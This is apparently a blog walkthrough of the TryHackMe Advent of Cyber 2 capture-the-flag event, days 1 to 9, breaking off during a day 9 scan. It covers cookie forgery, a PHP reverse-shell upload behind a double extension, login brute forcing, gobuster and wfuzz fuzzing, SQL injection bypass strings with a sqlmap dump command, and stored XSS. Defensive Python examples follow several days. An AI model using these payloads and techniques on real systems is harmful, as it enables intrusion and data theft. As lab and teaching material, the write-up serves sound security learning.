Advent of Cyber 2 is an event by TryHackMe where they release 25 CTF challenges (1 per day) leading up to Christmas day! I missed out last year so here I am in 2020 trying to crack all 25 challenges! I will be updating this post (hopefully daily) as more challenges are released. Let's see if I will be able to crack all 25. Hacky Holidays! :)
After last year's shenanigans where Elf McElferson and Elf McSkidy were on damage control mode the entirety of December, McSkidy vowed to never let that happen again. The previous Christmas period was extremely stressful with the Christmas Monster managing to compromise every system within Santa's corporate infrastructure to prevent Christmas from happening. Is Christmas still in danger this year?
-Backstory
Prerequisite
As always, just make sure that the VPN connection is active and ready to go 😊
```
sudo openvpn /path/to/file.ovpn
```
Okay now onto the challenges!
[Day 1] A Christmas Crisis
Web Exploitation | HTTP | Cookies
Having read the lengthy dossier, you get ready to hack your way back into Santa's Christmas Control Centre! You enter the IP address at the top of the screen into your browser search bar and press enter to load the page.
Accessing the IP via a browser returns the target web app that was meant to be exploited. First thing I did was to create an account and login.
All controls were turned off by the "attacker". At this point it was clear that some sort of privilege escalation had to be done to get to Santa's account so that all controls could be turned on. I started inspecting the site as per normal (robots.txt, HTML/CSS inspection, session storage/cookie values).
Cookie
On closer inspection I realized that there was a cookie named `auth` and its value was encoded in hexadecimal.
decoded cookie value
While decoding, I realized that the username was exposed. Thus, to become the `santa` user I encoded the same string but with the username `santa`, modified the cookie value with the new value I got and finally hit refresh.
And....that's how I gained access to "Santa's" account. After switching all the controls' status to active, I was also awarded the flag for this challenge.
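The weakness in Day 1 is that the `auth` cookie is only hex-encoded, so whoever holds it can read and rewrite the username. The following is an added example (not code from the challenge or from this write-up's author) that shows the weak scheme beside a hardened one in which the server appends an HMAC-SHA256 tag. The JSON layout of the cookie, the field names and the server key are constructed assumptions; the real cookie format on the box is not reproduced here.

```python
import hashlib
import hmac
import json

# Constructed sample of the weak cookie payload: plain JSON, hex-encoded. The real field
# layout on the challenge box is not shown here, so this structure is an assumption.
SAMPLE_FIELDS = {"company": "The Best Festival Company", "username": "alice"}

# Constructed server-side secret; in production this is a random value that never reaches the client.
SERVER_KEY = b"constructed-server-side-secret"


def encode_hex_cookie(fields: dict) -> str:
    """Weak scheme: hex is an encoding, not protection; anyone can decode, edit and re-encode."""
    return json.dumps(fields, sort_keys=True).encode().hex()


def decode_hex_cookie(value: str) -> dict:
    return json.loads(bytes.fromhex(value).decode())


def weak_identity(value: str) -> str:
    """What the vulnerable server does: trust the username carried in the cookie."""
    return decode_hex_cookie(value)["username"]


def sign_cookie(fields: dict, key: bytes = SERVER_KEY) -> str:
    """Hardened scheme: same payload, plus an HMAC-SHA256 tag the client cannot forge."""
    payload = encode_hex_cookie(fields)
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verified_identity(value: str, key: bytes = SERVER_KEY):
    """Return the username only when the tag verifies; None for anything tampered or malformed."""
    payload, sep, tag = value.partition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    return decode_hex_cookie(payload)["username"]


def forge(cookie: str, new_username: str) -> str:
    """The tampering step described above: rewrite the username and re-encode, keeping any tag."""
    payload, sep, tag = cookie.partition(".")
    fields = decode_hex_cookie(payload)
    fields["username"] = new_username
    return encode_hex_cookie(fields) + sep + tag


def demo():
    weak_cookie = encode_hex_cookie(SAMPLE_FIELDS)
    weak_result = weak_identity(forge(weak_cookie, "santa"))       # the server believes the forgery

    signed_cookie = sign_cookie(SAMPLE_FIELDS)
    genuine = verified_identity(signed_cookie)                    # "alice"
    tampered = verified_identity(forge(signed_cookie, "santa"))   # None: the tag no longer matches
    return weak_result, genuine, tampered


if __name__ == "__main__":
    print(demo())
```

Signing stops the forgery but the payload is still readable; if the cookie must hide its contents as well, encrypt-then-MAC (or an AEAD such as AES-GCM) replaces the plain hex step. Either way, the server, not the client, should be the only party able to produce an accepted cookie.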
[Day 2] The Elf Strikes Back!
Web Exploitation | RCE
For Elf McEager:
You have been assigned an ID number for your audit of the system: `ODIzODI5MTNiYmYw`. Use this to gain access to the upload section of the site.
Good luck!
Accessing the IP via a browser returns the target web app that was meant to be exploited.
I was told to enter an ID as the `GET` parameter. However, I entered a blank `GET` parameter (`?id=`) and I was redirected to a file upload page.
I also realized that there was a `/upload/` directory that was accessible by the public.
I was quick to realize that this was a file upload vulnerability. While inspecting the file upload page's source code, I realized that it only accepted `jpeg`, `jpg` and `png` files.
I started off by grabbing one of the default shells in Kali from `/usr/share/webshells/php/`:

```
┌──(nee㉿kali)-[~/boxes/thm/christmas/day2]
└─$ ls /usr/share/webshells/php/
```
I then renamed the file to `php-reverse-shell.jpg.php`. This was to evade the front-end file check. Following this, I was able to upload the reverse shell onto the server.
I then fired up netcat and set up a listening connection on the port specified in the reverse shell file.
Lastly, I triggered the file by simply accessing it via the `/uploads/` directory which I discovered earlier and got a responsive shell!
andddd....flag! 🙋♂️
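The upload filter in Day 2 was client-side only and it trusted the extension of a name like `php-reverse-shell.jpg.php`. As an added example (not code from the challenge or the author), here is the server-side validation that closes that gap: exactly one extension, an allowlist, a check that the first bytes really are the claimed image format, and a server-chosen storage name so the uploader controls neither path nor extension. The allowlist comes from the page; the sample inputs are constructed.

```python
import hashlib
import os
import re

# Extensions the page says the front-end check accepted.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png"}

# Well-known file signatures for those formats; the uploaded bytes must start with one of these.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
}

SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename: str, data: bytes):
    """Server-side validation. Returns (accepted, reason). The client-side filter is not trusted."""
    base = os.path.basename(filename.replace("\\", "/"))   # strip any directory part, either separator
    parts = base.split(".")
    if len(parts) != 2:
        # Rejects double extensions such as 'php-reverse-shell.jpg.php' and extension-less names.
        return False, "filename must be <name>.<ext> with exactly one extension"
    stem, ext = parts[0], parts[1].lower()
    if not SAFE_STEM.match(stem):
        return False, "filename contains unsafe characters"
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} is not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match the claimed image type"
    return True, "ok"


def storage_name(data: bytes, ext: str) -> str:
    """Store under a server-chosen name derived from the content, never the uploader's name."""
    return hashlib.sha256(data).hexdigest()[:32] + "." + ext.lower()


# Constructed inputs (not files from the challenge): a PHP file behind a double extension,
# a valid PNG, PHP content with a .png name, and a traversal attempt on the filename.
SAMPLES = [
    ("php-reverse-shell.jpg.php", b"<?php /* constructed placeholder */ ?>"),
    ("logo.png", MAGIC["png"] + b"\x00" * 16),
    ("logo2.png", b"<?php /* constructed placeholder */ ?>"),
    ("../../var/www/html/logo3.png", MAGIC["png"] + b"\x00" * 16),
]


def demo():
    return {name: validate_upload(name, data) for name, data in SAMPLES}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name!r}: {verdict}")
```

The traversal sample is accepted because only the basename is considered and the file is then stored under `storage_name()`, so the supplied directory part never reaches the filesystem. Serving the upload directory with script execution disabled is the remaining layer: even a file that slips through should never be interpreted by PHP.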
[Day 3] Christmas Chaos
Web Exploitation | Authentication Bypass
McSkidy runs to the room, slamming open the door to see Santa's sleigh's control panel lit up in red error messages! "Santa's sleigh! It's been hacked, code red.. code red!" he screams as he runs back to the elf security command center. Can you help McSkidy and his team hack into Santa's Sleigh to re-gain control?
Wordlist (given to assist with the process):

| Username | Password |
| --- | --- |
| root | root |
| admin | password |
| user | 12345 |
Accessing the IP via a browser returns the target web app that was meant to be exploited.
I was quick to realize that this had something to do with brute forcing the login credentials.
First thing I did was to setup my proxy and launch [burpsuite](https://portswigger.net/burp) and add the target url to my scope. (This was to prevent intercepting other traffic on my machine)
Next, I entered a set of incorrect credentials to capture the login request to the server. This was so that I could repeat the requests with credentials from the wordlist provided.
I was able to see the username and password field and its values in the request that I captured with my proxy (Burpsuite).
I then sent the request to [Intruder](https://portswigger.net/burp/documentation/desktop/tools/intruder/using) to continue with the attack.
In Intruder, we are able to set the fields that we would like to fuzz. In this case, I set the username and password as the fields to fuzz.
Next, I imported the wordlist into payload sets 1 and 2 respectively for username & password and fired off the attaccccc.
As seen above, one of my payloads' response length was shorter than the others. This could mean that those were the right set of credentials. Thus, I proceeded to login with these credentials.
And....I was presented with the flag after logging in with the brute forced credentials! GGs.
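Seen from the server side, the Intruder run above is a burst of login POSTs from one address, and the successful one stands out by its response size just as it did in the Intruder table. The following is an added detection example (not code from the challenge or the author) that parses Apache-style access log lines, raises an alert when one source sends five or more login POSTs within a sliding 60-second window, and reports the odd-one-out response sizes for that source. The log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed access-log lines (Apache common format); they are not from the challenge box.
# 10.0.0.5 hammers the login form once per second; its final request gets a different response size.
SAMPLE_LOG = """\
10.0.0.9 - - [03/Dec/2020:09:59:58 +0000] "GET / HTTP/1.1" 200 2210
10.0.0.7 - - [03/Dec/2020:09:59:59 +0000] "POST /login HTTP/1.1" 200 1532
10.0.0.5 - - [03/Dec/2020:10:00:01 +0000] "POST /login HTTP/1.1" 200 1532
10.0.0.5 - - [03/Dec/2020:10:00:02 +0000] "POST /login HTTP/1.1" 200 1532
10.0.0.5 - - [03/Dec/2020:10:00:03 +0000] "POST /login HTTP/1.1" 200 1532
10.0.0.5 - - [03/Dec/2020:10:00:04 +0000] "POST /login HTTP/1.1" 200 1532
10.0.0.5 - - [03/Dec/2020:10:00:05 +0000] "POST /login HTTP/1.1" 200 1532
10.0.0.5 - - [03/Dec/2020:10:00:06 +0000] "POST /login HTTP/1.1" 302 318
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')


def parse_line(line: str):
    """Split one log line into a dict; None for lines that do not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, size = m.groups()
    return {
        "ip": ip,
        "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
        "method": method,
        "path": path,
        "status": int(status),
        "size": 0 if size == "-" else int(size),
    }


def detect_bruteforce(lines, path="/login", threshold=5, window_s=60):
    """Return {ip: first_alert_time} for sources with >= threshold login POSTs inside a sliding window."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if not ev or ev["method"] != "POST" or ev["path"] != path:
            continue
        window = recent[ev["ip"]]
        window.append(ev["time"])
        while (ev["time"] - window[0]).total_seconds() > window_s:
            window.popleft()                      # drop attempts older than the window
        if len(window) >= threshold and ev["ip"] not in alerts:
            alerts[ev["ip"]] = ev["time"]
    return alerts


def response_size_outliers(lines, ip, path="/login"):
    """Response sizes seen exactly once for this source: the same signal the Intruder length column gave."""
    counts = defaultdict(int)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["ip"] == ip and ev["path"] == path:
            counts[ev["size"]] += 1
    return sorted(size for size, n in counts.items() if n == 1)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for ip, when in detect_bruteforce(lines).items():
        print(f"ALERT {ip}: login brute force, first seen {when.isoformat()}")
        print(f"  unusual response sizes: {response_size_outliers(lines, ip)}")
```

The size outlier is the defender's clue that one of the attempts succeeded and the account needs a password reset; the mitigation is rate limiting or lockout on the login path, plus making failed and successful responses the same size so the length column carries no signal.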
[Day 4] Santa's watching
Web Exploitation | Authentication Bypass
Our malicious, despicable, vile, cruel, contemptuous, evil hacker has defaced Elf's forums and completely removed the login page! However, we may still have access to the API. The sysadmin also told us that the API creates logs using dates with a format of YYYYMMDD. We also know that the API takes a date in the form of YYYYMMDD. Aid in the recovery of Elf's forums!
This is what I was provided with when accessing the site.
I started off with a `gobuster` scan against the box to discover the API directory.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day4]
└─$ gobuster dir -u http://10.10.116.182/ -w /usr/share/wordlists/dirb/big.txt
```
After finding the API, I moved on to fuzzing it with the wordlist that was provided by THM. I knew that the API took in a date parameter. Thus I formed a `wfuzz` command that fuzzes the `date` parameter with the given wordlist.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day4]
└─$ wfuzz -c -z file,wordlist -d "date=FUZZ" -u 10.10.116.182/api/site-log.php
```
- `-c` = shows the output in color
- `-d` = specify the parameters you want to fuzz with
- `-z` = specifies what will replace FUZZ in the request
- `-u` = target URI
After the attack completed I realized that one of the responses had some characters in the response. Thus, I went to check it out.
And that's how I solved day 4's challenge!
[Day 5] Someone stole Santa's gift list!
Web Exploitation | SQLi | PHP
After last year's attack, Santa and the security team have worked hard on reviving Santa's personal portal. Hence, 'Santa's forum 2' went live.
After the attack, logs have revealed that someone has found Santa's panel on the website and logged into his account! After doing so, they were able to dump the whole gift list database, getting all the 2020 gifts in their hands. An attacker has threatened to publish a wishlist.txt file, containing all information, but happily, for us, he was caught by the CBI (Christmas Bureau of Investigation) before that. On 10.10.206.123:8000 you'll find the copy of the website and your goal is to replicate the attacker's actions by dumping the gift list!
This is what I was provided with when accessing the site.
The first task was to find santa's login panel.
Without using directory brute forcing, what's Santa's secret login panel?
HINT: The name is derived out of 2 words from this question. /stap*l
The panel could be found at `http://10.10.206.123:8000/santapanel`.
A simple SQL Injection payload allows us to bypass the login screen and login to the portal as santa~!
```
' or true --
admin' or 1=1 --
```
After bypassing the login page, I was greeted with a portal search access to the database. I decided to fire up burp and capture the search request.
Now that I had the search request, I proceeded to run SQLmap on the request file to see if the GET parameter `search` was injectable.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day5]
└─$ sqlmap -r search.req --tamper=space2comment --dump-all --dbms sqlite
```
- `-r` = request file
- `--tamper` = the string given to us to bypass the WAF
- `--dump-all` = dumps all the entries in the database
- `--dbms` = to specify the backend database that santa is using
And with that, day 5's challenge is over!
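The login bypass and the `space2comment` tamper in Day 5 both come down to the query being built by string concatenation. As an added example (not code from the challenge or the author), here is a stand-in for the panel's SQLite login query in its vulnerable form beside the parameterised form, run against a constructed in-memory database. It shows that the `admin' or 1=1 --` payload from above, and the same payload with every space replaced by `/**/`, both log in against the concatenated query and neither does against the bound one, which is why a space-blocking WAF is not a fix.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for Santa's panel database (the page says the backend is SQLite)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('santa', 'constructed-password')")
    con.commit()
    return con


def login_vulnerable(con, username: str, password: str):
    # String concatenation: the quote in the payload closes the literal, "or 1=1" makes the
    # WHERE clause true for every row, and "--" comments out the password check entirely.
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return con.execute(query).fetchone()


def login_safe(con, username: str, password: str):
    # Parameter binding: the payload is compared as one literal string and matches no row.
    return con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def demo():
    con = build_db()
    payload = "admin' or 1=1 --"                 # the bypass used above
    spaceless = "admin'/**/or/**/1=1/**/--"      # what space2comment produces: same effect, no spaces
    return {
        "vulnerable": login_vulnerable(con, payload, "x"),
        "vulnerable_spaceless": login_vulnerable(con, spaceless, "x"),
        "safe_payload": login_safe(con, payload, "x"),
        "safe_real_login": login_safe(con, "santa", "constructed-password"),
    }


if __name__ == "__main__":
    for case, row in demo().items():
        print(f"{case}: {row}")
```

Blocking the literal space is a signature, and SQL treats `/**/` as whitespace, so the signature is trivially sidestepped; binding parameters removes the class of bug rather than one spelling of the payload. The same applies to the `search` parameter sqlmap dumped: a bound query would have returned nothing for the injected strings.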
[Day 6] Be careful with what you wish on a Christmas night
Web Exploitation | Javascript | XSS
This year, Santa wanted to go fully digital and invented a "Make a wish!" system. It's an extremely simple web app that would allow people to anonymously share their wishes with others. Unfortunately, right after the hacker attack, the security team has discovered that someone has compromised the "Make a wish!". Most of the wishes have disappeared and the website is now redirecting to a malicious website. An attacker might have pretended to submit a wish and put a malicious request on the server! The security team has pulled a back-up server for you on 10.10.66.131:5000. Your goal is to find the way the attacker could have exploited the application.
This is what I was provided with when accessing the site.
There wasn't a flag to uncover in this challenge. The main goal was to find the way the attacker could have exploited the application.
I fired up ZAP and started an Automated Scan against the website.
ZAP was quick in finding out that there were 2 Cross Site Scripting vulnerabilities that could be abused.
That was pretty easy. However, I wanted to test it out for myself and see if the site was actually vulnerable. Here's how I did it.
I generated this payload which I could inject into the `wishes` database and trigger a persistent XSS attack. So, whenever someone views this page, they'll see my logo and when they mouse over it, an alert will pop up saying "Nee was here."
That's the end of day 6!
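The stored XSS in Day 6 works because a wish is written into the page as raw HTML, so an image tag with a mouse-over handler becomes live markup for every visitor. The following is an added example (not code from the challenge or the author) that renders a constructed wish of that kind the vulnerable way and then with output encoding, and counts how many tags inside the list item came from user input in each case. The wish text and the wrapper markup are constructed assumptions.

```python
import html
import re

# Constructed wish carrying a stored-XSS payload of the kind described above: an image whose
# mouse-over handler runs script. The handler body is a harmless placeholder string.
MALICIOUS_WISH = '<img src="logo.png" onmouseover="alert(\'constructed\')">'
BENIGN_WISH = "A new sled & a bag of carrots for Rudolph"

WRAPPER_OPEN, WRAPPER_CLOSE = '<li class="wish">', "</li>"
TAG_RE = re.compile(r"<[^>]+>")


def render_unsafe(wish: str) -> str:
    """How the vulnerable page behaves: user input is dropped straight into the HTML."""
    return f"{WRAPPER_OPEN}{wish}{WRAPPER_CLOSE}"


def render_safe(wish: str) -> str:
    """Output encoding: <, >, &, and both quote characters become entities, so the browser
    displays the wish as text instead of parsing it as markup."""
    return f"{WRAPPER_OPEN}{html.escape(wish, quote=True)}{WRAPPER_CLOSE}"


def user_controlled_tags(rendered: str):
    """Tags found inside the wrapper element; anything here originated from the wish itself."""
    inner = rendered[len(WRAPPER_OPEN):-len(WRAPPER_CLOSE)]
    return TAG_RE.findall(inner)


def demo():
    return {
        "unsafe_tags": user_controlled_tags(render_unsafe(MALICIOUS_WISH)),
        "safe_tags": user_controlled_tags(render_safe(MALICIOUS_WISH)),
        "benign_safe": render_safe(BENIGN_WISH),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Escaping at the point of output is the primary fix; the text of the wish, including the word `onmouseover`, still appears on the page, but only as characters. A Content-Security-Policy that disallows inline event handlers is the usual second layer, so that an encoding bug missed somewhere else does not turn into script execution.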
[Day 7] The Grinch Really Did Steal Christmas
Network | Wireshark | Packet Analysis
It's 6 AM and Elf McSkidy is clocking-in to The Best Festival Company's SOC headquarters to begin his watch over TBFC's infrastructure. After logging in, Elf McEager proceeds to read through emails left by Elf McSkidy during the nightshift.
More automatic scanning alerts, oh look, another APT group. It feels like it's going to be a long, but easy start to the week for Elf McEager.
Whilst clearing the backlog of emails, Elf McEager reads the following: "URGENT: Data exfiltration detected on TBFC-WEB-01". "Uh oh" goes Elf McEager. "TBFC-WEB-01? That's Santa's webserver! Who has the motive to steal data from there?!". It's time for the ever-vigilant Elf McEager to prove his salt and find out exactly what happened.
Unknowingly to Elf McEager, Elf McSkidy made this all up! Fortunately, this isn't a real attack - but a training exercise created ahead of Elf McEager's performance review.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day7]
└─$ ls -lah
total 8.5M
drwxr-xr-x 2 nee nee 4.0K Dec  7 13:30 .
drwxr-xr-x 6 nee nee 4.0K Dec  7 13:30 ..
-rwxrw-rw- 1 nee nee 4.2M Dec  7 13:29 aoc-pcaps.zip
-rw-r--r-- 1 nee nee 3.7M Nov 30 17:16 pcap1.pcap
-rw-r--r-- 1 nee nee  35K Nov 30 17:37 pcap2.pcap
-rw-r--r-- 1 nee nee 598K Nov 30 19:48 pcap3.pcap
```
I was given 3 files to investigate.
Challenge 1
The first challenge was to find out which IP address initiates an ICMP/ping in `pcap1.pcap`.
For this challenge, I filtered the traffic by protocol and viewed the first entry that was returned.
The source that initiated the ping request was 10.11.3.2
Challenge 2
The next challenge was to construct a simple filter in Wireshark that would only return the HTTP GET requests.
This can be done with a basic filter as follows:

```
http.request.method == GET
```
The next part to this challenge was to find out the name of the article that the IP address `10.10.67.199` visited. For this, I chained 2 filters together to narrow down my traffic.
```
ip.src == 10.10.67.199 || http.request.method == GET
```
|| = AND
This filter led me to a packet where it was sending a `GET` request to `/posts`. Thus, I followed the traffic and investigated more.
And in that stream was the name of the article! `reindeer-of-the-week`
For the next challenge, I was given a pcap file and asked to retrieve the password that was leaked via the `FTP` protocol during the login process.
I opened the pcap file with wireshark and filtered for FTP traffic.
On inspection, I realized that there was a packet with the info `Please specify the password`. I followed the TCP stream of that particular packet and was presented with the password.
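Following the TCP stream works because FTP sends `USER` and `PASS` in the clear and the server answers each with a numeric reply code. As an added example (not code from the challenge or the author), here is a small parser that walks a control-channel conversation laid out the way "Follow TCP Stream" shows it and lists every login attempt with whether the server accepted it, which is the output a defender needs to decide which credentials to rotate. The conversation, usernames and passwords are constructed.

```python
# Constructed FTP control-channel conversation, one line per message, as "Follow TCP Stream"
# would show it. It is not the challenge's capture; the credentials are placeholders.
SAMPLE_STREAM = """\
220 (vsFTPd 3.0.3)
USER elfmcskidy
331 Please specify the password.
PASS constructed-wrong-password
530 Login incorrect.
USER elfmcskidy
331 Please specify the password.
PASS constructed-right-password
230 Login successful.
SYST
215 UNIX Type: L8
"""


def parse_ftp_logins(stream: str):
    """Walk the control channel and return every login attempt as {user, password, success}.
    Both USER and PASS travel unencrypted, which is exactly why the capture exposes the password."""
    attempts = []
    user = password = None
    for line in stream.splitlines():
        verb, _, arg = line.strip().partition(" ")
        code = verb if verb.isdigit() else None      # server replies start with a 3-digit code
        if verb.upper() == "USER":
            user, password = arg, None
        elif verb.upper() == "PASS":
            password = arg
        elif code == "230" and user is not None:    # 230: login accepted
            attempts.append({"user": user, "password": password, "success": True})
            user = password = None
        elif code == "530" and user is not None:    # 530: login rejected
            attempts.append({"user": user, "password": password, "success": False})
            user = password = None
    return attempts


def leaked_credentials(stream: str):
    """Only the pairs the server accepted: the credentials that must be treated as compromised."""
    return [(a["user"], a["password"]) for a in parse_ftp_logins(stream) if a["success"]]


if __name__ == "__main__":
    for attempt in parse_ftp_logins(SAMPLE_STREAM):
        print(attempt)
    print("leaked:", leaked_credentials(SAMPLE_STREAM))
```

The same reply codes (331, 230, 530) drive Wireshark's own FTP dissector, so the filter `ftp.response.code == 230` finds successful logins directly; the parser above does the equivalent over exported stream text. The fix for the leak itself is to move the service to FTPS or SFTP so the password never crosses the wire in plaintext.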
Challenge 3
And for the last challenge, I was given another pcap file and asked to discover what was on Elf McSkidy's wishlist that will be used to replace Elf McEager.
The first thing I did was to see if there were any HTTP objects that I could export. To my surprise, there was a file named `christmas.zip` that was transmitted during the packet capture.
I then proceeded to save this zip file and investigate it further.
Unzipping the file gave me access to 6 files. However, I was only interested to look at one file in particular. It was `elf_mcskidy_wishlist.txt`.
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day7/christmas]
└─$ cat elf_mcskidy_wishlist.txt
Wish list for Elf McSkidy
Budget: £100
x3 Hak 5 Pineapples
x1 Rubber ducky (to replace Elf McEager)
```
And there it was. The answer to "What is on Elf McSkidy's wishlist that will be used to replace Elf McEager?".
That concludes day 7 of the event!
[Day 8] What's Under the Christmas Tree?
Networking | NMAP
After a few months of probation, intern Elf McEager has passed with glowing feedback from Elf McSkidy. During the meeting, Elf McEager asked for more access to The Best Festival Company's (TBFC's) internal network as he wishes to know more about the systems he has sworn to protect.
Elf McSkidy was reluctant to agree. However, after Elf McEager's heroic actions in recovering Christmas, Elf McSkidy soon thought this was a good idea. This was uncharted territory for Elf McEager - he had no idea how to begin finding out this information for his new responsibilities. Thankfully, TBFC has a wonderful up-skill program covering the use of Nmap for Elf McEager to enrol in.
Target = 10.10.214.172 // I've added an entry in my hosts file to this IP
Since the day was based around `NMAP`, I fired off my NMAP scan even before reading the challenge questions.
```
┌──(nee㉿kali)-[~]
└─$ nmap -sC -sV -A tbfc.blog
Nmap scan report for tbfc.blog (10.10.214.172)
Host is up (0.35s latency).
Not shown: 996 closed ports
PORT      STATE    SERVICE       VERSION
80/tcp    open     http          Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Hugo 0.78.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TBFC's Internal Blog
2222/tcp  open     ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cf:c9:99:d0:5c:09:27:cd:a1:a8:1b:c2:b1:d5:ef:a6 (RSA)
|   256 4c:d4:f9:20:6b:ce:fc:62:99:54:7d:c2:b4:b2:f2:b2 (ECDSA)
|_  256 d0:e6:72:18:b5:20:89:75:d5:69:74:ac:cc:b8:3b:9b (ED25519)
3389/tcp  open     ms-wbt-server xrdp
49157/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Challenge 1
The challenge was to find the ports that were open & hosting services and arrange them in ascending order.
That wasn't too hard, thanks to the NMAP scan I kicked off earlier.
80 = Web
2222 = SSH //SeCuRiTy ThOrUgH ObScUrIty
3389 = RDP
Challenge 2
The next challenge was to find the distribution of Linux the machine was using.
This was pretty straightforward due to the scan I ran earlier. But to be exact, the option `-A` assisted with this one. (Aggressive scan)
```
80/tcp    open     http          Apache httpd 2.4.29 ((Ubuntu))
2222/tcp  open     ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
```
Challenge 3
The last challenge was to use NMAP's Network Scripting Engine to retrieve the `HTTP-TITLE` of the web server and infer what the site could've been used for.
The option `-sC` came in clutch for this challenge. `-sC` performs a script scan using the default set of scripts NMAP has in store.
```
80/tcp    open     http          Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Hugo 0.78.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TBFC's Internal Blog
```
Thus, I concluded that the site was being used as a blog.
And....that's about it for day 8!
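The three Day 8 questions are all answered by reading the scan report: open ports in order, a distribution name in the version banners, and the value of one NSE script. As an added example (not code from the challenge or the author), here is a parser for Nmap's normal output that attaches the script lines to the port they belong to, so the same questions can be answered over any number of reports. The sample text is the Day 8 output from above, laid out one entry per line.

```python
import re

# The Day 8 scan output shown above, one entry per line (the page's own data, not a new scan).
NMAP_OUTPUT = """\
Nmap scan report for tbfc.blog (10.10.214.172)
Host is up (0.35s latency).
Not shown: 996 closed ports
PORT      STATE    SERVICE       VERSION
80/tcp    open     http          Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Hugo 0.78.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TBFC's Internal Blog
2222/tcp  open     ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 cf:c9:99:d0:5c:09:27:cd:a1:a8:1b:c2:b1:d5:ef:a6 (RSA)
3389/tcp  open     ms-wbt-server xrdp
49157/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# A PORT table row: "80/tcp    open     http          Apache httpd 2.4.29 ((Ubuntu))"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# An NSE script line: "|_http-title: TBFC's Internal Blog" (continuation lines start with digits or spaces)
SCRIPT_RE = re.compile(r"^\|_?\s*([A-Za-z][\w-]*):\s*(.*)$")


def parse_ports(text: str):
    """Return one dict per PORT table row, with any NSE script output attached to that port."""
    ports, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {
                "port": int(m[1]), "proto": m[2], "state": m[3],
                "service": m[4], "version": m[5].strip(), "scripts": {},
            }
            ports.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            current["scripts"][m[1]] = m[2].strip()
    return ports


def open_ports(ports):
    """Challenge 1: the open ports in ascending order."""
    return sorted(p["port"] for p in ports if p["state"] == "open")


def infer_distro(ports):
    """Challenge 2: the first distribution name that appears in a service banner."""
    for p in ports:
        for name in ("Ubuntu", "Debian", "CentOS", "Red Hat"):
            if name in p["version"]:
                return name
    return None


def script_output(ports, script_name):
    """Challenge 3: the value of one NSE script (e.g. http-title), wherever it appears."""
    for p in ports:
        if script_name in p["scripts"]:
            return p["scripts"][script_name]
    return None


if __name__ == "__main__":
    ports = parse_ports(NMAP_OUTPUT)
    print("open ports:", open_ports(ports))
    print("distribution:", infer_distro(ports))
    print("http-title:", script_output(ports, "http-title"))
```

For anything beyond a one-off, `nmap -oX` gives XML that `xml.etree.ElementTree` parses without regular expressions; the text parser here is for the normal output that ends up in write-ups and tickets.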
[Day 9] Anyone can be Santa!
Networking | FTP
Even Santa has been having to adopt the "work from home" ethic in 2020. To help Santa out, Elf McSkidy and their team created a file server for The Best Festival Company (TBFC) that uses the FTP protocol. However, an attacker was able to hack this new server. Your mission, should you choose to accept it, is to understand how this hack occurred and to retrace the steps of the attacker.
Target = 10.10.113.151
I started off the day with the usual NMAP scan used in one of the previous days and these were my results
```
┌──(nee㉿kali)-[~/boxes/thm/adventofcyber2/day9]
└─$ nmap -Pn -sC -sV -A -oN initial.nmap 10.10.113.151
Nmap scan report for 10.10.113.151
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x    2 0        0            4096 Nov 16 15:04 backups
| drwxr-xr-x    2 0        0            4096 Nov 16 15:05 elf_workshops
